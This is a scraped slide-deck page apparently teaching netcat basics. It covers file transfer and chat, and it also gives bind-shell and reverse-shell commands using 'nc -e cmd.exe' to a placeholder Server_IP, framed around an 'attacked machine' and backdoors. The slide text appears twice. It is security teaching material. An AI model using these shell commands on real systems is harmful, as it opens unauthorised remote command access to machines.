Embed presentation
Downloaded 314 times





![ File transfer/ chat works by setting up a
server and client.
FileTransfer
nc –l –p 1234 > testfile.txt [Reciever’s end]
nc IP_Address 1234 < testfile.txt [Sender’s end]
type abc.jpeg | nc –lvp 8080
nc –l Server_IP 8080 > abc.jpeg
Chat Server
nc –l –p 1234 [Reciever’s end]
nc IP_Address 1234 [Sender’s end]](https://image.slidesharecdn.com/netcat-101swissarmyknife-140528235739-phpapp01/85/Netcat-101-Swiss-Army-Knife-6-320.jpg)

![ We can take cmd.exe/shell and bind it to a
local port, and anyone connecting to this port
will be presented with command prompt
belonging to that machine.This is known as a
BIND SHELL. Syntax as follows…
# nc –l -p 1337 –e cmd.exe [Server]
# nc –v Server_IP 1337 [Client]](https://image.slidesharecdn.com/netcat-101swissarmyknife-140528235739-phpapp01/85/Netcat-101-Swiss-Army-Knife-8-320.jpg)
![ Reverse Shell:
Netcat can also "send" a shell to another
instance of a listening Netcat session.This is
especially useful if the attacked machine is
behind a firewall or otherwise nat'ed
# nc –lvp 1337 [Server]
# nc –v Server_IP 1337 –e cmd.exe [Client]](https://image.slidesharecdn.com/netcat-101swissarmyknife-140528235739-phpapp01/85/Netcat-101-Swiss-Army-Knife-9-320.jpg)



Netcat is a tool that can read and write data across networks using TCP or UDP. It can perform functions like port scanning to view open ports, banner grabbing to identify services and versions, file transfers between systems, and creating listening shells to provide remote access to systems. Netcat is useful for tasks like transferring files or chatting between systems and can also be used to set up backdoors and bind or reverse shells for remote command line access.





![ File transfer/ chat works by setting up a
server and client.
FileTransfer
nc –l –p 1234 > testfile.txt [Reciever’s end]
nc IP_Address 1234 < testfile.txt [Sender’s end]
type abc.jpeg | nc –lvp 8080
nc –l Server_IP 8080 > abc.jpeg
Chat Server
nc –l –p 1234 [Reciever’s end]
nc IP_Address 1234 [Sender’s end]](https://image.slidesharecdn.com/netcat-101swissarmyknife-140528235739-phpapp01/85/Netcat-101-Swiss-Army-Knife-6-320.jpg)

![ We can take cmd.exe/shell and bind it to a
local port, and anyone connecting to this port
will be presented with command prompt
belonging to that machine.This is known as a
BIND SHELL. Syntax as follows…
# nc –l -p 1337 –e cmd.exe [Server]
# nc –v Server_IP 1337 [Client]](https://image.slidesharecdn.com/netcat-101swissarmyknife-140528235739-phpapp01/85/Netcat-101-Swiss-Army-Knife-8-320.jpg)
![ Reverse Shell:
Netcat can also "send" a shell to another
instance of a listening Netcat session.This is
especially useful if the attacked machine is
behind a firewall or otherwise nat'ed
# nc –lvp 1337 [Server]
# nc –v Server_IP 1337 –e cmd.exe [Client]](https://image.slidesharecdn.com/netcat-101swissarmyknife-140528235739-phpapp01/85/Netcat-101-Swiss-Army-Knife-9-320.jpg)

